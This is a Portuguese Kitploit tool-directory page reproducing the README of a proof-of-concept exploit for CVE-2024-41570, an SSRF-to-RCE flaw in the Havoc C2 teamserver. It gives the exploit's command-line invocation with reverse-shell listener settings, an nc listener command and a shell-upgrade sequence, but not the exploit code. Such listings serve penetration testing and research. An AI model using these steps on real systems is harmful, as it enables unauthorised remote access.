Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-41570 — Exploração automatizada de Reverse Shell via WebSocket | Havoc-C2-SSRF com RCE | Kitploit
Ferramentas/GitHubGitHub/diemoeve/cve-2024-41570
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Exploração automatizada de Reverse Shell via WebSocket | Havoc-C2-SSRF com RCE

Ver Repositório
12218há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-41570 | Havoc C2 SSRF com RCE | Exploração Automática de Reverse Shell via WebSocket

Este projeto fornece um script de prova de conceito (PoC) baseado em Python para explorar um serviço vulnerável baseado em WebSocket. O script automatiza o registro de agentes, a entrega de payloads via WebSocket e a execução remota de comandos para estabelecer um reverse shell.

Funcionalidades

  • Registra um agente no serviço de destino.
  • Abre um WebSocket e envia payloads de handshake e autenticação.
  • Executa comandos remotamente via reverse shell.
  • Fornece um fluxo de trabalho guiado com instruções claras.

Pré-requisitos

  • Python 3.x instalado na sua máquina.
  • Instale as dependências necessárias executando:
    pip install -r requirements.txt
    

Instalação

  1. Clone este repositório:
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Navegue até o diretório do projeto:
    cd CVE-2024-41570
    
  3. Instale as dependências:
    pip install -r requirements.txt
    

Uso

Execute o script com os argumentos necessários:

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Argumentos

  • -t: URL de destino do servidor WebSocket.
  • -i: Endereço IP do Team Server do Havoc.
  • -p: Porta do Team Server do Havoc.
  • -U: Nome de usuário para autenticação no WebSocket.
  • -P: Senha para autenticação no WebSocket.
  • -l: IP do listener para o reverse shell (sua máquina).
  • -L: Porta do listener para o reverse shell (sua máquina).

Exemplo de Comando

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Passos para Executar

  1. Certifique-se de que o serviço de destino está em execução e vulnerável.
  2. Execute o script com os parâmetros necessários.
  3. Em um terminal separado, inicie um listener:
    nc -lvnp <listener_port>
    
  4. Faça o upgrade do shell:
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

Dependências

O script requer as seguintes bibliotecas Python:

  • requests
  • pycryptodome

Instale-as usando o comando:

pip install -r requirements.txt

Aviso de Segurança

Este script destina-se apenas a fins educacionais. Certifique-se de ter autorização explícita para testar o sistema de destino. O uso indevido deste script pode violar leis e diretrizes éticas.

Referências

Inspirado por Default Havoc Poc

Contribuindo

Contribuições são bem-vindas! Sinta-se à vontade para fazer um fork do repositório e enviar um pull request.

Licença

Este projeto é licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.

Baixar ferramenta